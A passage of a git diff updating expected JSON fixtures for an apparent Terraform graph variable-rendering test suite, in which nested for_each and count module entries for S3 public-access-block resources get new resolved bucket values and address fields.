"module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -842,15 +824,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -858,30 +839,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -890,15 +873,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -906,30 +888,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -938,15 +922,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -954,30 +937,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -986,15 +971,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1002,30 +986,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1034,15 +1020,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1050,30 +1035,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1082,15 +1069,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1098,12 +1084,12 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2" + ] } } ] @@ -1111,17 +1097,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1130,15 +1118,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1146,30 +1133,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1178,15 +1167,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1194,12 +1182,12 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2" + ] } } ] @@ -1207,17 +1195,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1226,15 +1216,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1242,12 +1231,39 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2" + ] + } + } + ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": { + "variable": [ + { + "count_var": { + "__address__": "count_var", + "__end_line__": 4, + "__start_line__": 2, + "default": [ + 2 + ] + } + }, + { + "foreach_var": { + "__address__": "foreach_var", + "__end_line__": 8, + "__start_line__": 6, + "default": [ + [ + "a", + "b" + ] + ] } } ] diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json index d8a6f2fa138..20e29ce8752 100644 --- a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json +++ b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json @@ -107,7 +107,7 @@ ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" @@ -123,7 +123,7 @@ ], "__start_line__": 6, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" @@ -155,6 +155,64 @@ } ] }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module": { + "__end_line__": 4, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module[\"b\"].inner_s3_module" + } + }, + { + "inner_s3_module2": { + "__end_line__": 9, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 6, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module[\"b\"].inner_s3_module2" + } + } + ], + "variable": [ + { + "bucket": { + "__end_line__": 14, + "__start_line__": 12, + "type": [ + "string" + ], + "__address__": "module.s3_module[\"b\"].bucket" + } + }, + { + "bucket2": { + "__end_line__": 18, + "__start_line__": 16, + "type": [ + "string" + ], + "__address__": "module.s3_module[\"b\"].bucket2" + } + } + ] + }, "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}": { "module": [ { @@ -165,7 +223,7 @@ ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" ], "source": [ "./module2" @@ -181,7 +239,7 @@ ], "__start_line__": 6, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" @@ -213,11 +271,69 @@ } ] }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module": { + "__end_line__": 4, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module2[1].inner_s3_module" + } + }, + { + "inner_s3_module2": { + "__end_line__": 9, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 6, + "bucket2": [ + true + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module2[1].inner_s3_module2" + } + } + ], + "variable": [ + { + "bucket": { + "__end_line__": 14, + "__start_line__": 12, + "type": [ + "string" + ], + "__address__": "module.s3_module2[1].bucket" + } + }, + { + "bucket2": { + "__end_line__": 18, + "__start_line__": 16, + "type": [ + "string" + ], + "__address__": "module.s3_module2[1].bucket2" + } + } + ] + }, "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + false ], "__address__": "module.s3_module[\"a\"].module.inner_s3_module.bucket2" } @@ -235,7 +351,7 @@ true ], "bucket": [ - "var.bucket" + false ], "ignore_public_acls": [ true @@ -243,7 +359,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -261,13 +378,13 @@ } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + false ], - "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" } ], "resource": [ @@ -283,7 +400,7 @@ true ], "bucket": [ - "var.bucket" + false ], "ignore_public_acls": [ true @@ -291,7 +408,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -304,18 +422,18 @@ "type": [ "string" ], - "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket2" + "" ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" } ], "resource": [ @@ -331,7 +449,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -339,7 +457,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -352,18 +471,18 @@ "type": [ "string" ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket2" + "" ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" } ], "resource": [ @@ -379,7 +498,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -387,7 +506,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -400,103 +520,18 @@ "type": [ "string" ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": { - "variable": [ - { - "count_var": { - "__end_line__": 4, - "__start_line__": 2, - "default": [ - 2 - ], - "__address__": "count_var" - } - }, - { - "foreach_var": { - "__end_line__": 8, - "__start_line__": 6, - "default": [ - [ - "a", - "b" - ] - ], - "__address__": "foreach_var" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module": { - "__end_line__": 4, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - 